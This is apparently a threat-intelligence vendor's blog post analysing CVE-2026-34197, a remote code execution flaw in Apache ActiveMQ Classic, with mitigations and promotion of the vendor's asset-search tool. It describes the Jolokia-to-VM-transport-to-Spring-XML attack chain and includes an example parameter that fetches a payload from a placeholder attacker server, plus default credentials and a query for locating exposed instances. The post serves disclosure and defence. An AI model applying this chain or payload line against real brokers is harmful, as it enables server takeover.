Contact Us
Blog

CVE-2026-34197: Apache ActiveMQ RCE Vulnerability Analysis

We analyze the cause and attack chain of CVE-2026-34197, and examine how ActiveMQ assets can become part of the attack surface.

In April 2026, a remote code execution (RCE) vulnerability, CVE-2026-34197, was disclosed in Apache ActiveMQ Classic, remaining undiscovered for over 13 years. Rated 8.8 (High) under CVSS v3.1, this vulnerability stems from a complex interaction between the Jolokia management API, VM Transport, and the Spring XML initialization mechanism. Unlike typical vulnerabilities, this issue cannot be easily identified by analyzing individual components in isolation. Additionally, in certain versions, it can be chained with the previously disclosed CVE-2024-32114, enabling immediate exploitation without authentication.

Notably, this vulnerability was first discovered by an AI model (Claude). Security researcher Naveen Sunkavally (Horizon3) stated that the exploitation path was derived using “just a few basic prompts,” highlighting the growing impact of AI in modern security research. In this article, we analyze the root cause and attack chain of CVE-2026-34197, and examine how internet-exposed ActiveMQ assets can become part of the attack surface.

Overview of the Apache ActiveMQ RCE Vulnerability

AI-generated image of the Apache ActiveMQ RCE vulnerability
CategoryDescription
Vulnerability IDCVE-2026-34197
Affected ProductApache ActiveMQ Classic
Vulnerability TypeImproper input validation / code injection
CVSS Score8.8
Affected Versionbelow 5.19.4, and 6.0.0 to below 6.2.3
Patched Version5.19.4 and above, 6.2.3 and above
Additional Risk ConditionIn ActiveMQ versions 6.0.0-6.1.1, chaining with CVE-2024-32114 may expose the Jolokia API without authentication.

Apache ActiveMQ is an open-source message broker written in Java, providing message queue and topic-based capabilities for asynchronous communication. ActiveMQ Classic continues to be widely deployed across enterprise systems, web backends, and government environments, particularly within legacy Java-based infrastructures. This broad deployment significantly amplifies the potential impact of the vulnerability.

Root Cause: Risk Emerging from the Combination of Three Features

CVE-2026-34197 is not caused by a single flaw, but rather a composite vulnerability that emerges only when three otherwise legitimate features are combined. As Sunkavally explains, “each feature behaves as intended individually, but becomes dangerous when used together.”

Step 1: Excessive Privileges in the Jolokia API
Following the patch for CVE-2022-41678 in 2023, the ActiveMQ team restricted the Jolokia management API to read-only by default. However, to maintain web console functionality, an exception flag was introduced to allow full operations on ActiveMQ-specific MBeans. This exception includes the addNetworkConnector operation, which enables dynamic addition of broker-to-broker connections.

Step 2: Remote Configuration Loading via VM Transport
VM Transport is designed to embed brokers within applications, allowing direct communication between client and broker within the same JVM. If an attacker references a non-existent broker using a vm:// URI, ActiveMQ will instantiate a new broker and load configuration data from the URL specified in the brokerConfig parameter.

Step 3: Arbitrary Code Execution via Spring XML Initialization
If an attacker specifies a remote Spring XML file using a parameter such as: brokerConfig=xbean:http://[attacker-server]/payload.xml the broker will fetch the XML and instantiate all defined beans during initialization. This process enables the execution of arbitrary OS commands with server-level privileges, effectively leading to remote code execution.

Potential Attack Scenario

Following public disclosure, the expected attack flow is as follows:

1. Identification of Exposed ActiveMQ Instances
Attackers use internet scanning tools such as Criminal IP to locate ActiveMQ instances with ports 61616 or 8161 exposed. Version information can often be retrieved from HTTP response headers or management interfaces.

2. Authentication Bypass or Credential Access

  • For versions 6.0.0–6.1.1, attackers may exploit CVE-2024-32114 to access the Jolokia API without authentication
  • For other versions, default credentials (admin:admin) or stolen credentials may be used

3. Remote Code Execution
Attackers invoke the Jolokia API’s addNetworkConnector operation with a crafted URI:
brokerConfig=xbean:http://[attacker-server]/payload.xml

The broker retrieves the remote Spring XML and executes arbitrary commands during initialization.

4. Post-Exploitation and Persistence
Once server-level access is obtained, attackers can deploy web shells, perform internal reconnaissance, steal credentials, and execute additional payloads.

Apache ActiveMQ has historically been a frequent attack target, with vulnerabilities such as CVE-2016-3088 (authenticated RCE) and CVE-2023-46604 (unauthenticated RCE) already listed in the CISA KEV catalog. Both ransomware groups and nation-state actors have repeatedly targeted ActiveMQ, and CVE-2026-34197 is highly likely to be rapidly weaponized in a similar pattern.

Internet-Exposed ActiveMQ Assets Observed via Criminal IP

A critical factor in this vulnerability is not just the broker port itself, but the exposure of the management interface. Since CVE-2026-34197 is exploited through the Jolokia management API, Criminal IP detection focuses on identifying ActiveMQ-related assets based on web response characteristics, using conditions designed to detect exposed management interfaces.

Criminal IP Asset Search results for title: Apache ActiveMQ

Criminal IP Search Query: title: Apache ActiveMQ

This query is designed to identify assets where “Apache ActiveMQ” appears in the web page title, allowing detection of externally accessible ActiveMQ web consoles or management interfaces. The results revealed approximately 200 assets, with some instances exposing ActiveMQ management interfaces directly to the internet. These assets go beyond simple exposure, they are likely management endpoints where the Jolokia API may also be accessible, making them high-priority targets from an attacker’s perspective.

In the context of vulnerabilities like CVE-2026-34197, where remote configuration loading via management functionality can lead to code execution, such exposure represents not just information disclosure but a direct attack surface.

Example of an internet-exposed Apache ActiveMQ asset

Further analysis shows that in some environments, not only management ports but also SSH (22) and HTTPS (443) are exposed alongside ActiveMQ services. This suggests that fully operational message broker environments are directly exposed to the internet, rather than isolated services. In such configurations, once access to the management interface is achieved, attackers may proceed with configuration manipulation, message flow control, or chained exploitation with additional vulnerabilities, increasing both attack complexity and impact.

Mitigation and Recommendations

Basic Security Measures

The first and most critical step is to update ActiveMQ Classic to version 5.19.4 or 6.2.3 or later, as officially recommended by both Apache and NVD.

In addition, organizations must verify the exposure of Jolokia and management interfaces:

  • Update ActiveMQ Classic to the latest version
  • Reassess /api/* authentication settings for versions 6.0.0–6.1.1
  • Verify whether Jolokia (/api/jolokia) is externally exposed
  • Replace default accounts and weak administrative credentials
  • Detect traces of vm:// and brokerConfig=xbean:http:// in broker logs
  • Monitor abnormal outbound HTTP requests and suspicious child process creation
  • Minimize external access to the management port (8161) and broker port (61616)

Beyond Patching: Attack Surface Visibility

CVE-2026-34197 demonstrates why a patch-only approach is insufficient, highlighting the need for an Attack Surface Management (ASM)-driven strategy. Although ActiveMQ is typically deployed as internal middleware, real-world environments often expose management consoles (8161) or broker ports (61616) unintentionally. Without full visibility into all ActiveMQ instances within an organization, it becomes difficult to determine which assets are at immediate risk.

This is especially critical for versions vulnerable to chaining with CVE-2024-32114, where exposed systems effectively become high-value targets accessible without authentication. Organizations must move beyond vulnerability detection and adopt continuous monitoring using tools like Criminal IP ASM, enabling them to:

  • Identify externally exposed assets
  • Correlate version information with vulnerability data
  • Prioritize security actions based on real-world exploitability

FAQ

Q1. If CVE-2026-34197 requires authentication, why should it be treated as critical?

While CVE-2026-34197 typically requires Jolokia authentication, in versions 6.0.0–6.1.1, it can be chained with CVE-2024-32114 to completely bypass authentication. Additionally, in environments where default credentials remain unchanged, authentication barriers are effectively nonexistent. Given ActiveMQ’s history as a repeated target of real-world attacks, the authentication requirement becomes a low barrier in practical attack scenarios, justifying its high-risk classification.

Q2. Why did this vulnerability remain undiscovered for 13 years?

This vulnerability is not caused by a single component flaw, but by the interaction of three features:

  • Jolokia API privilege exceptions
  • VM Transport remote configuration loading
  • Spring XML initialization execution

Traditional vulnerability research methods, which analyze components in isolation, struggle to identify such cross-component attack paths. The fact that this vulnerability was discovered using AI highlights its ability to analyze complex interactions across multiple components simultaneously, without predefined assumptions.

Conclusion

CVE-2026-34197 is not a flaw in a single feature of ActiveMQ Classic, but a management interface–driven RCE that emerges from the combination of Jolokia, MBean operations, VM transport, and remote configuration loading. In certain 6.x environments, it can be further escalated into an unauthenticated attack through vulnerability chaining, significantly increasing its risk.

As a result, the key response to this issue goes beyond simply applying patches. Organizations must update ActiveMQ to the latest version while also verifying Jolokia exposure, restricting external access to the management port (8161), eliminating default credentials, and analyzing suspicious log activity. Leveraging tools like Criminal IP to identify externally exposed assets can provide practical visibility into management interface exposure, enabling faster detection and mitigation of real-world attack paths.

In relation to this, you can refer to CVE-2026-3502: Supply Chain Attack via TrueConf Update Mechanism 

You can subscribe to Criminal IP (criminalip.io/register) and start detecting vulnerable assets right away. You can also request a demo using the button below and explore Criminal IP’s threat intelligence (TI) analysis of externally exposed assets at the enterprise level.


This report is based on data from Criminal IP, a Cyber Threat Intelligence search engine. Sign up for a free Criminal IP account today to explore the search results mentioned in the report and delve into comprehensive threat intelligence.

Source: Criminal IP(https://www.criminalip.io), BLEEPINGCOMPUTER (https://www.bleepingcomputer.com/news/security/13-year-old-bug-in-activemq-lets-hackers-remotely-execute-commands/), SECURITYWEEK (https://www.securityweek.com/rce-bug-lurked-in-apache-activemq-classic-for-13-years/), gbhackers (https://gbhackers.com/claude-identifies-critical-13-year-old-rce-vulnerability-in-apache-activemq/)

Related article: https://www.criminalip.io/knowledge-hub/blog/33719

CVE-2026-34197: Apache ActiveMQ RCE Vulnerability Analysis | CIP Blog | Criminal IP